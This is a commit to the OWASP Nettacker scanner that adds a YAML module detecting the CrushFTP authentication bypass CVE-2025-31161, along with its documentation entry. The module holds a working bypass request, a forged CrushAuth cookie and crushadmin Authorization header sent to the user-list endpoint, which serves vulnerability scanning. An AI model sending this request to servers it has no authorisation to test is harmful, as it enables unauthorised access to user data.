New module to detect CrushFTP CVE-2025-31161 (#1126)

* New module: crushftp_cve_2025_31161_vuln

* Update nettacker/modules/vuln/crushftp_cve_2025_31161.yaml

coderabbit formatting fix

Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
Signed-off-by: Sam Stepanyan <sam.stepanyan@owasp.org>

* clean-up coderabbit issues

---------

Signed-off-by: Sam Stepanyan <sam.stepanyan@owasp.org>
Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>

Author: securestep9

docs/Modules.md

@@ -139,6 +139,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 * '**clickjacking_vuln**' - check the web server for missing 'X-Frame-Options' header (clickjacking protection)
 * '**content_security_policy_vuln**' - check the web server for missing 'Content-Security-Policy' header
 * '**content_type_options_vuln**' - check the web server for missing 'X-Content-Type-Options'=nosniff header
+* '**crushftp_cve_2025_31161_vuln**' - check the target for CrushFTP CVE-2025-31161 vulnerability
 * '**f5_cve_2020_5902_vuln**' - check the target for F5 RCE CVE-2020-5902 vulnerability 
 * '**heartbleed_vuln**' - check SSL for Heartbleed vulnerability (CVE-2014-0160)
 * '**msexchange_cve_2021_26855**' - check the target for MS Exchange SSRF CVE-2021-26855 (proxylogon/hafnium)

nettacker/modules/vuln/crushftp_cve_2025_31161.yaml

@@ -0,0 +1,60 @@
+info:
+  name: crushftp_cve_2025_31161_vuln
+  author: OWASP Nettacker Team
+  severity: 9.8
+  description: >
+    This module checks for a critical improper authentication vulnerability in CrushFTP
+    (CVE-2025-31161). The vulnerability allows unauthenticated users to access sensitive
+    files and execute arbitrary commands, leading to potential data exposure and system
+    compromise.
+
+  reference:
+    - https://ccb.belgium.be/advisories/warning-critical-improper-authentication-vulnerability-crushftp-patch-immediately
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-31161
+    - https://www.huntress.com/blog/crushftp-cve-2025-31161-auth-bypass-and-post-exploitation
+
+  profiles:
+    - crushftp
+    - vuln
+    - vulnerability
+    - http
+    - high_severity
+
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          Cookie: "CrushAuth=1111111111_111111111111111111111111111111111"
+          Authorization: "AWS4-HMAC-SHA256 Credential=crushadmin/"
+          Connection: "close"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors: []
+            data:
+              paths:
+                - "/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111"
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 8080
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: '200'
+              reverse: false
+            content:
+              regex: '<user_list_subitem>crushadmin</user_list_subitem>'
+              reverse: false